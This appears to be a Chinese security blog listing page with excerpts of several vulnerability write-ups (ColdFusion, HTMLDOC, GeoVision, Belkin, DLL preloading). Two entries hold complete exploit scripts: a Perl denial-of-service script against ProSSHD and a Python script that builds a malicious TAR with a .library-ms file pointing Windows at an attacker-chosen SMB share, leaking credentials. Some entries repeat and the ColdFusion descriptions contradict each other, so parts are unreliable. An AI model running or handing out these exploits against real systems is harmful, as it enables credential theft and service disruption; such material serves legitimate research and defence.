远程攻击 on 办公AI智能小助手

Adobe ColdFusion 2023.6 远程文件读取漏洞分析与利用

Wed, 10 Dec 2025 06:28:04 +0800

Adobe ColdFusion 2023.6 远程文件读取

发布日期： 2025年7月28日 提交者： @İbrahimsql 风险等级： 高 利用类型： 远程 CVE编号： CVE-2024-20767 CWE编号： CWE-284 (不恰当的访问控制)

Adobe ColdFusion 2023.6远程文件读取漏洞分析与利用

Wed, 12 Nov 2025 21:44:06 +0800

Adobe ColdFusion 2023.6 远程文件读取漏洞

漏洞信息

风险等级: 高
本地利用: 否
远程利用: 是
CVE编号: CVE-2024-20767
CWE分类: CWE-284（不恰当的访问控制）

漏洞描述

该漏洞存在于Adobe ColdFusion 2023.6版本中，攻击者可以利用此漏洞远程读取服务器上的任意文件。漏洞利用需要先获取服务器的UUID，然后通过构造特定的HTTP请求来读取目标文件。

HTMLDOC 1.9.13 栈缓冲区溢出漏洞分析与利用

Sun, 09 Nov 2025 12:54:45 +0800

HTMLDOC 1.9.13 - 栈缓冲区溢出漏洞分析

漏洞概述

HTMLDOC 1.9.13版本中的BMP图像解析器存在栈缓冲区溢出漏洞。该漏洞位于image_load_bmp函数中，攻击者可以通过特制的BMP文件触发缓冲区溢出，实现远程代码执行。

Adobe ColdFusion 2023.6远程文件读取漏洞分析与利用

Thu, 23 Oct 2025 16:26:00 +0800

Adobe ColdFusion 2023.6远程文件读取漏洞

漏洞信息

风险等级: 高
本地利用: 否
远程利用: 是
CVE编号: CVE-2024-20767
CWE分类: CWE-284（不恰当的访问控制）

漏洞描述

ColdFusion 2023（LUcee）存在远程代码执行漏洞，攻击者可以利用该漏洞远程读取服务器上的敏感文件。

GeoVision ASManager远程代码执行漏洞分析与利用

Thu, 23 Oct 2025 14:10:00 +0800

漏洞标题：GeoVision ASManager Windows应用6.1.2.0 - 远程代码执行(RCE)

日期：2025-03-19

漏洞作者：Giorgi Dograshvili [DRAGOWN]

厂商主页：https://www.geovision.com.tw/

软件链接：https://www.geovision.com.tw/download/product/

版本：6.1.2.0或更早版本

测试环境：Windows 10 | Kali Linux

CVE：CVE-2025-26264

PoC：https://github.com/DRAGOWN/CVE-2025-26264

GeoVision GV-ASWeb在6.1.2.0或更早版本中，其"通知设置"功能存在远程代码执行(RCE)漏洞。拥有"系统设置"权限的认证攻击者可以利用此漏洞在服务器上执行任意命令，导致系统完全被入侵。

深入解析DLL预加载远程攻击向量及防护策略

Mon, 08 Sep 2025 12:56:58 +0800

关于DLL预加载远程攻击向量的更多信息

今天，我们发布了安全公告2269637，通知客户存在一类影响以不安全方式加载DLL的应用程序的远程攻击向量。开发人员早已了解此问题的根本原因。然而，上周研究人员发布了这些问题的远程攻击向量，而过去这些问题通常被认为是本地的且影响相对较低。在本博客文章中，我们希望分享：

ProSSHD 1.2 20090726 远程拒绝服务(DoS)漏洞利用分析

Sat, 06 Sep 2025 19:14:49 +0800

漏洞标题: ProSSHD 1.2 20090726 - 拒绝服务(DoS)

Google搜索关键词: 无

日期: 2024年1月13日

漏洞作者: Fernando Mengali

厂商主页: https://prosshd.com/

软件下载链接: 无

版本: 1.2 20090726

测试环境: Windows XP

CVE编号: CVE-2024-0725

$sis="$^O";

if ($sis eq "windows"){
  $cmd="cls";
} else {
  $cmd="clear";
}

system("$cmd");

intro();
main();

print "\t    ==> 正在连接到Web服务器... \n\n";
sleep(1);

my $i=0;
print "\t    ==> 正在利用漏洞... \n\n";

my $payload = "\x41" x 500;

$connection2 = Net::SSH2->new();
$connection2->connect($host, $port) || die "\n错误: 连接被拒绝!\n";
$connection2->auth_password($username, $password) || die "\n错误: 用户名/密码被拒绝!\n";
$scpget = $connection2->scp_get($payload);
$connection2->disconnect();

print "\t    ==> 完成! 漏洞利用成功!";

sub intro {
  print q {
                            ,--,
                     _ ___/ /\|
                 ,;'( )__, )  ~
                //  //   '--; 
                '   \     | ^
                     ^    ^

    [+] ProSSHD 1.2 20090726 - 拒绝服务(DoS)

    [*] 代码作者: Fernando Mengali

    [@] 邮箱: fernando.mengalli@gmail.com
  }
}

sub main {
  our ($ip, $port, $username, $password) = @ARGV;

  unless (defined($ip) && defined($port)) {
    print "\n\t用法: $0 <ip> <端口> <用户名> <密码>           \n";
    exit(-1);
  }
}

Belkin路由器硬编码凭证漏洞利用分析

Sat, 06 Sep 2025 05:47:47 +0800

Belkin F9K1009 F9K1010 2.00.04/2.00.09 - 硬编码凭证漏洞利用

漏洞概述

CVE编号: CVE-2025-8730
漏洞类型: 硬编码凭证导致的认证绕过
影响设备: Belkin F9K1009和F9K1010路由器
固件版本: 2.00.04和2.00.09

Windows 10 Pro x64 文件管理器TAR提取远程漏洞利用

Sat, 06 Sep 2025 04:20:07 +0800

Windows File Explorer Windows 10 Pro x64 - TAR Extraction - Windows remote Exploit

漏洞信息

EDB-ID: 52325
CVE: 2025-24071
类型: 远程漏洞
平台: Windows
日期: 2025-06-13
作者: Daniel Miranda
验证状态: EDB已验证

漏洞利用代码

import os
import tarfile

def main():
    file_name = input("Enter your file name: ")
    ip_address = input("Enter IP (EX: 192.168.1.162): ")

    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip_address}\\IT</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

    library_file_name = f"{file_name}.library-ms"
    with open(library_file_name, "w", encoding="utf-8") as f:
        f.write(library_content)

    tar_name = "exploit.tar"
    with tarfile.open(tar_name, "w") as tarf:
        tarf.add(library_file_name)

    if os.path.exists(library_file_name):
        os.remove(library_file_name)

    print("completed")

if __name__ == "__main__":
    main()

技术说明

该漏洞利用涉及以下技术要点：